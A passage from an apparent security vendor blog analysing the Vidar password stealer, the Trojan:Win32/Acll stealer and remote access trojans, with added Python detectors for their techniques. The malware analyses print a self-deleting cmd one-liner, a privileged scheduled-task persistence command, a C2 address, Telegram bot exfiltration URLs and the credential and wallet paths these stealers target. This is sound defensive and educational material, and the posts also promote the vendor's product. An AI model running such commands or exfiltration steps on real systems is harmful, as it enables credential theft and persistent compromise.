Beware of spear phishing. It may take different forms, from email messages sent from a compromised business mailbox to social media posts from the hijacked account of a legitimate company. But however sophisticated the attempt, hackers can never build a legend that survives verification. Most commonly, they lure victims with urgent events or exclusive deals. A simple check of the source will reveal the scam: if the impersonated company has nothing to do with such claims, ignore the alarming message.

Avoid pirated software. Despite losing a significant share of infections to the expansion of email spam, software cracks are still used for spreading malware. Torrent trackers and third-party websites are flooded with offers of brand-new software, and try to guess which one is infected. Using only licensed software will not only keep you on the right side of the law, but also eliminate the risk of malware injection. And, believe me, dealing with the consequences of malware activity will cost you far more than you can save on program licences.

Protect your system with proper anti-malware software. Yes, it is better to stay out of muddy waters altogether, but having a security tool that takes care of problems will make your life much easier. Not just any utility will do, though, as infostealer malware has tricks for evading basic anti-malware software. GridinSoft Anti-Malware gives it no chance, thanks to its three-component detection system and constant updates that keep its databases relevant.

What is Infostealer Malware? Top 5 Stealers in 2024

Password Stealer
https://gridinsoft.com/blogs/password-stealer/ (Tue, 28 May 2024 11:04:42 +0000)

A password stealer is a type of data-stealing malware that aims at a specific category of information. Password stealers are often spread through phishing, malvertising, and sometimes cracked software. Let’s have a more detailed look at how they work and how to protect yourself against them.

What Is a Password Stealer?

As its name suggests, a password stealer is a type of malware that aims to steal sensitive data, mainly credentials for email accounts, social networks, and online banking. These days, however, quite a few password stealers incorporate more diverse functionality: they now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

how password stealer works

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers are also distributed via malicious ads in search results. In some cases, spear phishing was used to target a specific person with the malware.

Technical Analysis

All stealers are generally very similar, so the properties of this sample apply to the others, perhaps with minimal differences. This will be a rather simplified analysis aimed at understanding how a password stealer works; I will go through the most common and important actions this malware performs. For the test sample, I’ve chosen Vidar Stealer, a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of a legitimate program’s installer, it can contain a run of null bytes at the beginning that pushes its size over 700 MB. This size lets it avoid immediate detection by antivirus solutions and online checkers like VirusTotal, which have upload and scan size limits. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualized environment, reading values such as:

HKLM/System/Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware, which, besides revealing a virtual machine, lets the malware build a digital fingerprint of the infected system.
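A defender-side check for the null-byte inflation trick described above, as an added example (not code from the original post); the thresholds and the sample bytes are constructed assumptions, and the check works whether the padding sits before or after the real code:

```python
"""Detect executables inflated with long runs of null bytes.

Added example, not code from the original post. Flags files whose size has
been pushed up with zero bytes, the trick that moves a stealer sample past
scanner size limits. Sample inputs are constructed in memory.
"""
import re

# Constructed thresholds (assumptions, not from the post): tune for your fleet.
MIN_SUSPICIOUS_SIZE = 64 * 1024 * 1024    # only files of at least 64 MiB are considered
MIN_ZERO_FRACTION = 0.90                  # 90% of all bytes are 0x00
MIN_ZERO_RUN = 32 * 1024 * 1024           # or one contiguous 32 MiB zero run

_ZERO_RUN = re.compile(rb"\x00+")


def inflation_stats(data: bytes) -> dict:
    """Return size, share of null bytes, and the longest contiguous null run."""
    size = len(data)
    zero_count = data.count(b"\x00")
    longest_run = max((m.end() - m.start() for m in _ZERO_RUN.finditer(data)), default=0)
    return {
        "size": size,
        "zero_fraction": zero_count / size if size else 0.0,
        "longest_zero_run": longest_run,
    }


def is_null_inflated(data: bytes, *, min_size=MIN_SUSPICIOUS_SIZE,
                     min_fraction=MIN_ZERO_FRACTION, min_run=MIN_ZERO_RUN) -> bool:
    """True when a file is large mainly because of null-byte padding.

    Either a dominant share of zero bytes or one very long zero run is enough;
    legitimate large installers consist mostly of compressed, high-entropy data.
    """
    stats = inflation_stats(data)
    if stats["size"] < min_size:
        return False
    return stats["zero_fraction"] >= min_fraction or stats["longest_zero_run"] >= min_run


def scan_file(path: str) -> dict:
    """Triage one file on disk (reads it fully, which is fine for one-off checks)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {"path": path, "inflated": is_null_inflated(data), **inflation_stats(data)}


def build_constructed_sample(padding: int,
                             real: bytes = b"MZ" + bytes(range(2, 256)) * 64) -> bytes:
    """Constructed stand-in for a padded sample: a small 'real' part plus null padding."""
    return real + b"\x00" * padding


if __name__ == "__main__":
    # A constructed 'installer' with 96 MiB of nulls appended crosses both thresholds.
    padded = build_constructed_sample(96 * 1024 * 1024)
    print(is_null_inflated(padded))  # True
```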

Data Collection

Once the malware is convinced that it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function: information gathering. The password stealer reads the following browser-related locations:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain autofill data, saved passwords, cookies, cache, and browser extensions. Next, the stealer tries to collect crypto wallet data by checking the locations below. Only a few wallets are listed, as the full list is too long to reproduce.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final step is exfiltrating the stolen data. To do this, the password stealer communicates with its C2 (Command and Control) server to receive further instructions. There are various options for C2 communication: attackers often still use classic C2 servers, and sometimes they use Telegram or Mastodon as intermediate servers. In our case, however, the malware uses Steam. Before sending the stolen data, the stealer makes several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the profile’s strange name, “sppmon http://195.201.131.165|”, is a command for the malware: it is actually the address of the final server the stealer should connect to. The phrase “This user has also played as” on the profile page suggests that the address in the name changes quite often.

Steam profile screenshot
Steam profile as intermediate server
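As an added example (not code from the original post), the following shows how a defender can recover the C2 address from a dead-drop profile name of the form quoted above and correlate the Steam profile fetch with the follow-up request to a bare IP in proxy logs; the log lines and their field layout are constructed, reusing the profile ID and IP quoted in the post.

```python
"""Spot Steam-profile dead-drop resolving in web proxy logs.

Added example, not part of the original post. Two steps: parse the C2 URL
hidden in a profile name of the form "sppmon http://195.201.131.165|", and
pair a request to steamcommunity.com/profiles/<id> with a later request to a
literal-IP URL from the same client. Log lines are constructed.
"""
import re
from datetime import datetime, timedelta

# "<tag> <url>|": a short keyword, a URL, and a trailing pipe terminator.
DEAD_DROP_NAME = re.compile(r"^\s*(?P<tag>\w+)\s+(?P<url>https?://[^\s|]+)\|")
STEAM_PROFILE = re.compile(r"^https://steamcommunity\.com/profiles/\d+/?$")
# A URL whose host is a literal IPv4 address, e.g. http://195.201.131.165/
BARE_IP_URL = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/|$)")

# Constructed proxy log: "<ISO timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2024-05-28T10:04:12 10.0.0.21 GET https://steamcommunity.com/profiles/76561199548518734 200
2024-05-28T10:04:14 10.0.0.21 POST http://195.201.131.165/ 200
2024-05-28T10:05:01 10.0.0.22 GET https://steamcommunity.com/profiles/76561199548518734 200
2024-05-28T10:06:30 10.0.0.22 GET https://store.steampowered.com/app/730 200
2024-05-28T10:07:00 10.0.0.23 POST http://203.0.113.9/upload 200
"""


def extract_dead_drop_c2(profile_name: str):
    """Return the C2 URL hidden in a profile name, or None if it does not match."""
    m = DEAD_DROP_NAME.match(profile_name)
    return m.group("url") if m else None


def parse_log(text: str):
    """Turn the constructed log format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "method": method, "url": url, "status": int(status)})
    return events


def find_dead_drop_followups(events, window=timedelta(seconds=120)):
    """Pair each Steam profile fetch with a later bare-IP request from the same client.

    One alert per profile fetch; the search stops once the time window is exceeded.
    """
    alerts = []
    events = sorted(events, key=lambda e: e["ts"])
    for i, e in enumerate(events):
        if not STEAM_PROFILE.match(e["url"]):
            continue
        for later in events[i + 1:]:
            if later["ts"] - e["ts"] > window:
                break
            if later["client"] == e["client"] and BARE_IP_URL.match(later["url"]):
                alerts.append({"client": e["client"], "profile": e["url"],
                               "c2": later["url"],
                               "delay_s": (later["ts"] - e["ts"]).total_seconds()})
                break
    return alerts


if __name__ == "__main__":
    print(extract_dead_drop_c2("sppmon http://195.201.131.165|"))
    for alert in find_dead_drop_followups(parse_log(SAMPLE_LOG)):
        print(alert)
```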

When finished, the stealer deletes itself and covers its tracks. Not all infostealers do this; some prefer to stay in the system even after extracting all the data. But when they do, a shell command like this one comes in handy:

"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but they have some fundamental differences. The first difference lies in the principle of operation: a stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard input in addition to collecting sensitive data, this is not their main functionality.

Spyware, by contrast, can stay on an infected system for months and continuously collect data. This includes screenshots, captured keystrokes, and camera and microphone recordings. This data is sent periodically or in real time to the attacker’s server.

Safety Recommendations

Malware, and password stealers in particular, tends to become more and more sophisticated. Getting harder to detect, adopting new spreading methods, collecting more and more data: all this makes them a menace to be aware of. Fortunately, the ways to keep them off your PC are not particularly hard.

  • Be careful with email attachments. This is still the leading method among successful malware infections. Do not open attachments or click on links if the email has a suspicious sender or is not an email you were expecting.
  • Avoid cracked software. Pirated software is illegal in itself, and it also carries serious risks: attackers embed malicious code in “repacks”, and installing most cracked programs requires disabling security software.
  • Use security software. A reliable antimalware solution is essential because it can prevent malware from running and installing in case of user error. It also provides comprehensive protection by significantly reducing infection vectors. In addition, advanced solutions such as GridinSoft Anti-Malware have an Internet Security module that blocks potentially malicious sites.

Trojan:Win32/Acll
https://gridinsoft.com/blogs/trojan-win32-acll/ (Thu, 23 May 2024 10:46:11 +0000)

Trojan:Win32/Acll is stealer-type malware detected by Microsoft Defender. It targets sensitive information: login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or software bundles.

Trojan:Win32/Acll Overview

Trojan:Win32/Acll is stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a wide range of data, including system information, login credentials, personal details, and financial data. In addition to extracting data from applications such as browsers, email clients and messengers, Trojan:Win32/Acll can grab files, log keystrokes, manipulate the clipboard, and perform other spyware functions.

Trojan:Win32/Acll detection window screenshot
Trojan:Win32/Acll detection window

It spreads in ways typical of other spyware: malicious email attachments and pirated applications. However, some samples appear to mimic hardware management tools, specifically fan control utilities and UEFI parameter modifiers. In this way, the malware can obtain the highest privileges, as such software commonly requires root-level (administrator) access to work.

Technical Analysis

Let’s look at how Trojan:Win32/Acll behaves on the system. Although most samples are a rather recent discovery, there is quite a bit of research on each of them, meaning the malware is fairly widespread. Before starting its dirty deeds, it checks the environment for signs of virtualization. This reconnaissance helps Acll avoid analysis or sandboxing. The malware checks the following locations:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

These keys cover the user’s certificate stores, the enforcement of FIPS-compliant cryptographic algorithms, and various aspects of Explorer behavior and system security. The malware also uses code obfuscation and other tricks to avoid detection.

Mutex Creation & Privilege Escalation

After making sure it is not running in a hostile analysis environment, Trojan:Win32/Acll creates mutexes to prevent more than one instance from running at the same time:

Local\SM0:3648:304:WilStaging_02
Local\SM0:5144:304:WilStaging_02

Then the malware manipulates files and adds itself to the Task Scheduler to ensure regular execution. It also creates entries in the Run registry key, making the system launch the malware at startup.

schtasks /create /f /RU "%USERNAME%" /tr "%ProgramData%\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5

Creating these hooks completes the preparations; the malware then switches to loading DLLs and running at full capacity. Using the C:\Windows\System32\wuapihost.exe -Embedding command, Acll performs sideloading and is ready for the next step.
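Process-creation telemetry can flag both the self-delete one-liner shown in the Password Stealer analysis above and the Acll schtasks persistence command. The following is an added example (not code from the original posts); the event records and their field names are constructed, modelled loosely on a Sysmon process-creation export.

```python
"""Flag self-deletion and privileged scheduled-task persistence in process events.

Added example, not from the original posts. Rule 1 catches the pattern
  cmd /c taskkill /im <name> /f & erase <path> & exit
where <path> ends in <name>, i.e. a process wiping its own image. Rule 2 catches
  schtasks /create ... /tr <target> ... /rl HIGHEST
where <target> lives in a user-writable directory such as %ProgramData%.
Event records and field names are constructed (assumption).
"""
import re

SELF_DELETE = re.compile(
    r'taskkill\s+/im\s+"?(?P<image>[^"\s]+)"?\s+/f\s*&\s*(?:erase|del)\s+"?(?P<path>[^"&]+?)"?\s*&',
    re.IGNORECASE,
)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
SCHTASKS_TARGET = re.compile(r'/tr\s+"?(?P<target>[^"]+?)"?\s+/tn', re.IGNORECASE)
SCHTASKS_HIGHEST = re.compile(r"/rl\s+HIGHEST\b", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"(%programdata%|\\programdata\\|%appdata%|\\appdata\\|%temp%|\\temp\\)", re.IGNORECASE
)

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Users\user\Downloads\setup.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\user\Downloads\setup.exe" & exit'},
    {"pid": 4188, "parent_image": r"C:\ProgramData\WinTrackerSP\WinTrackerSP.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /f /RU "user" /tr "%ProgramData%\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST'},
    {"pid": 4201, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /tn "Adobe Acrobat Update Task" /tr "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /sc DAILY'},
    {"pid": 4230, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c taskkill /im notepad.exe /f"},
]


def detect_self_delete(event):
    """Alert when cmd kills an image and erases a path whose basename matches it."""
    m = SELF_DELETE.search(event["command_line"])
    if not m:
        return None
    image, path = m.group("image"), m.group("path").strip()
    if path.lower().rsplit("\\", 1)[-1] != image.lower():
        return None
    return {"rule": "self_delete", "pid": event["pid"], "image": image, "path": path}


def detect_privileged_task(event):
    """Alert on schtasks /create with /rl HIGHEST whose target sits in a user-writable dir."""
    cmd = event["command_line"]
    if not SCHTASKS_CREATE.search(cmd) or not SCHTASKS_HIGHEST.search(cmd):
        return None
    t = SCHTASKS_TARGET.search(cmd)
    target = t.group("target") if t else ""
    if not USER_WRITABLE.search(target):
        return None
    return {"rule": "privileged_task_user_writable", "pid": event["pid"], "target": target}


def scan_events(events):
    """Run every rule over every event and collect the hits in event order."""
    alerts = []
    for ev in events:
        for rule in (detect_self_delete, detect_privileged_task):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```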

Data Collection

As I said before, Trojan:Win32/Acll is an infostealer that specifically targets sensitive user data and cryptocurrency wallets. The malware attempts to collect credentials either as hashes or as plaintext passwords. Besides searching the device, it tries to retrieve passwords from shared password storage locations and browser folders. Acll checks the following locations:

C:\Program Files\Common Files\SSL\openssl.cnf
C:\Users\\AppData\Local\Google\Chrome\User Data\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\
C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data
C:\Users\user\AppData\Local\Vivaldi\User Data
C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data

Next, it switches to desktop cryptocurrency wallets. The list of targeted wallets is not massive, but I am sure it is just a matter of time before this malware starts targeting others.

C:\Program Files\Common Files\SSL\cert.pem
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
C:\Users\user\AppData\Roaming\Electrum\wallets
C:\Users\user\AppData\Roaming\Ethereum\keystore
C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
C:\Users\user\AppData\Roaming\bytecoin

The same goes for FTP and VPN credentials. The reviewed samples targeted only FileZilla, OpenVPN and NordVPN (if they targeted them at all), but such functionality is not hard to implement. I would still recommend resetting all passwords that were stored in any form on the affected device.

Data Exfiltration

After collecting the information, Trojan:Win32/Acll sends it to its C2. Several Win32/Acll samples use a Telegram bot as an intermediate server, as evidenced by their network activity:

https://api.telegram[.]org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage
https://api.telegram[.]org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendDocument

In addition to Telegram, the malware uses various cloud services, including OneDrive, Microsoft Azure, EdgeCast (Verizon Media), and others. Here is the list of IP addresses:

TCP 204.79.197.203:443
TCP 34.117.186.192:443
TCP 149.154.167.220:443
TCP 20.99.186.246:443

How To Remove Trojan:Win32/Acll?

To remove Trojan:Win32/Acll, I recommend using GridinSoft Anti-Malware, which you can download and install from the link below. After installation, run a Full scan and let it finish so the program can find all malware-related files. In addition to malware removal, GridinSoft Anti-Malware provides proactive protection and internet security, which helps prevent malware installation even at the download stage.

Trojan:Win32/Acll

Remote Access Trojan (RAT)
https://gridinsoft.com/blogs/remote-access-trojan-meaning/ (Thu, 16 May 2024 02:11:57 +0000)

A Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance of it. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs along with a legitimate program, e.g., inside cracked games from torrents or in an email attachment. Once an attacker compromises the host system, they can use it to spread the RAT to additional vulnerable computers, thus creating a botnet. A RAT can also be deployed as a payload by exploit kits. Once successfully deployed, the RAT connects directly to the command-and-control (C&C) server the attackers control, typically over a predefined TCP port. Because the RAT provides administrator-level access, an attacker can do almost anything on the victim’s computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. A RAT is similar to Remote Desktop Protocol (RDP) or AnyDesk but differs in its stealth. It establishes a command and control (C2) channel with the attacker’s server, through which attackers send commands and the RAT returns data. RATs also have built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules that provide other capabilities. For example, suppose an attacker gains a foothold using a RAT and, after examining the infected system, decides to install a keylogger. Depending on the needs, the RAT may have a built-in keylogging feature, the ability to download and add a keylogger module, or the ability to load and run a standalone keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people: they gained remote access to a computer authenticated to the SCADA (supervisory control and data acquisition) systems that controlled the country’s utility infrastructure. The Remote Access Trojan also let the attackers reach sensitive resources using the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can reach a threatening scale, up to a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because the malware typically carries many concealment features that let it evade detection. In addition, RATs keep resource utilization low so that there is no noticeable performance degradation, which makes the threat harder to spot.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.
  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

njRAT is probably the best-known and the oldest remote-access trojan. It appeared in 2012 and keeps getting updates that adjust its functionality to modern “standards”, which accounts for its longevity. The reason for this is probably the attention of state-sponsored threat actors, APT36 and APT41, who have used it in cyberattacks almost since its inception.

Njrat interface
Interface of njRAT 0.7 Golden edition

njRAT’s key functionality is typical of pretty much any remote-access trojan: providing remote access. This is topped up with uploading and downloading files on command, logging keystrokes, and capturing microphone and camera input. Some variants can also grab credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula looks like harmless software and carries a legitimate digital signature. However, this malware first appeared in 2012 and is used against high-level targets. It gives attackers full remote administration of the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses the Mimikatz credential tool to authenticate via pass-the-hash, reusing operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and its variants belong to the same family, sharing many features and workflow similarities. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting industrial control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly, also called Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into U.S. military networks in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, its developers released two significant versions of the RAT. Most likely, it is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and anti-forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable Task Manager, the firewall, or User Account Control (UAC) on Windows machines. In addition, Dark Comet uses encryption to avoid detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms, allowing payload creation for Windows, Linux, Mac OS X, and Android. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user already has such permissions. Since VNC is a legitimate tool, antivirus tools do not identify Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. The RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on stealth. Once one has landed, you will likely struggle to detect it, even if the exact sample is not new. That’s why the best way to protect against a Remote Access Trojan is to never give it a chance to run. The following methods are proactive measures that sharply reduce the chance of a malware infection and of getting into trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, the strategy for defending against RATs depends on organization-wide security training. Victims usually launch this malware through infected attachments and links in phishing campaigns, so employees must be vigilant not to accidentally contaminate the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal usernames and passwords for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a user’s identity will be compromised. For example, if one factor, such as the user’s password, is stolen or compromised, the other factors still stand between the attacker and the account.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

  • More strict firewall settings
  • Safelisting IP addresses for authorized users
  • Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to allow remote access only through secure connections established via VPNs or security gateways. A clientless remote access solution is another option: it requires no additional plug-ins or software on end-user devices, which are themselves targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. The zero-trust approach offers precise control over lateral movement instead of granting full network access. This is critical for containing RAT attacks, as attackers rely on lateral movement to infect other systems and reach sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is a threat only once it is installed and running on the target computer. Secure browsing, anti-phishing solutions, and constant patching of systems can minimize the likelihood of a RAT infection. Overall, these actions are good practice for improving security in any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications while hiding malicious features alongside the real application’s functionality. Monitoring applications and the system for abnormal behavior can help identify signs of a Remote Access Trojan.

Monitoring network traffic

An attacker uses a RAT to remotely control an infected computer over the network, so a RAT deployed on a local device must communicate with a remote C&C server. You should therefore watch for unusual network traffic associated with such communication. It is also best to use tools such as web application firewalls to monitor and block C&C messages.
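As an added example (not from the original post), the following Python scores connection regularity in flow records to surface C&C beaconing; it goes beyond the article by using the jitter of the polling interval as the signal, a general property of RAT check-ins. The flow records, thresholds and addresses are constructed; port 31337 is the Back Orifice default mentioned above.

```python
"""Score connection regularity to surface RAT command-and-control beaconing.

Added example, not part of the original post. A RAT that polls its C&C server
at a fixed interval leaves a low-jitter series of connections from one host to
one destination; ordinary browsing does not. Flow records are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch seconds, src, dst, dst_port)
SAMPLE_FLOWS = [
    # host A polls 198.51.100.7:31337 every ~60 s with +-2 s of jitter
    *[(1000 + i * 60 + (i % 3) - 1, "10.0.0.5", "198.51.100.7", 31337) for i in range(12)],
    # host B browses one site at irregular times
    (1003, "10.0.0.6", "203.0.113.10", 443), (1040, "10.0.0.6", "203.0.113.10", 443),
    (1700, "10.0.0.6", "203.0.113.10", 443), (1712, "10.0.0.6", "203.0.113.10", 443),
    (2600, "10.0.0.6", "203.0.113.10", 443),
]


def interval_stats(timestamps):
    """Mean inter-arrival time and its coefficient of variation (stdev / mean).

    Returns None when fewer than two gaps exist, since regularity is undefined.
    """
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mu = mean(gaps)
    cv = pstdev(gaps) / mu if mu > 0 else float("inf")
    return {"count": len(ts), "mean_gap": mu, "cv": cv}


def find_beacons(flows, min_connections=8, max_cv=0.15):
    """Group flows by (src, dst, port) and flag series of many, evenly spaced connections.

    Thresholds are assumptions: tune min_connections to the observation window
    and max_cv to how much jitter you are willing to tolerate.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)
    beacons = []
    for (src, dst, port), ts in by_pair.items():
        st = interval_stats(ts)
        if st and st["count"] >= min_connections and st["cv"] <= max_cv:
            beacons.append({"src": src, "dst": dst, "port": port, **st})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_FLOWS):
        print(beacon)
```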

Implement least privilege

The principle of least privilege means that applications, users, systems and so on should be restricted to the permissions and access they need to do their jobs. Applying it limits what an attacker can do with a RAT, because the malware inherits the privileges of the account and process it runs under.

Are Remote Access Trojans illegal?

